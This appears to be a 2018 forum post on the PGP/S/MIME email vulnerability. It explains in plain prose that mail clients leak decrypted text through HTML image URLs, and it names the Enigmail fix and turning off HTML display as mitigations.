Critical vulnerabilities in PGP/GPG and S/MIME email encrypt
Posted: Mon May 14, 2018 1:23 pm
This statement is wrong. The vulnerability exists with the email clients, which don't process the HTML emails correctly. The decrypted email text is interpreted by the email clients as part of a URL pointing to an image, and when fetching this URL, the server who is contacted for it, gets the URL with the decrypted email text. The encryption is therefore not cracked.
A new version of the add-on "Enigmail" for Thunderbird has already been released, which closes this vulnerability. A fix from the Thunderbird developers would have taken longer, so the Enigmail developers did the fix.
HTML emails are usually bad in view of security. People who had disabled the display of HTML emails in their email client were not affected by this vulnerability.